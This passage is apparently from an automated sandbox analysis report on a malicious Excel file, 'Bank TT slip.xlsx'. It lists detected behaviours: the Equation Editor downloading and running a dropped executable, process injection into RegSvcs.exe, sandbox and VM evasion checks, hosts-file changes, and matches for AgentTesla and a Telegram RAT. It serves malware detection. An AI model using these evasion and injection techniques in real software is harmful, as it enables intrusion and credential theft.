Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6D78	4_2_007C6D78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C4D79	4_2_007C4D79
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6134	4_2_007C6134
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6D91	4_2_007C6D91
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C4D88	4_2_007C4D88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6E1A	4_2_007C6E1A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3610	4_2_007C3610
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6B78	4_2_007C6B78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6771	4_2_007C6771
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C7751	4_2_007C7751
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E178A	4_2_002E178A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00286048	5_2_00286048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00285430	5_2_00285430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00282198	5_2_00282198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00285778	5_2_00285778

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: Bank TT slip.xlsx	Metadefender: Detection: 20%
Source: Bank TT slip.xlsx	ReversingLabs: Detection: 31%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Bank TT slip.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR66EC.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\JHFJngVRuKk

Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC132 push edx; ret	4_2_002EC139
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E8168 push ebx; ret	4_2_002E8169
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C702F push ss; iretd	4_2_007C704A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C597F push eax; retf 0017h	4_2_007C5980
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C029C push esp; ret	4_2_007C029D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C1359 pushfd ; iretd	4_2_007C135B

Source: initial sample	Static PE information: section name: .text entropy: 7.02001355184
Source: initial sample	Static PE information: section name: .text entropy: 7.02001355184

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 316	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9258			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 504			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: EQNEDT32.EXE, 00000002.00000002.962418834.0000000000384000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: EQNEDT32.EXE, 00000002.00000002.962329452.000000000035B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0368067D mov edx, dword ptr fs:[00000030h]

2_2_0368067D

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008	Jump to behavior

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
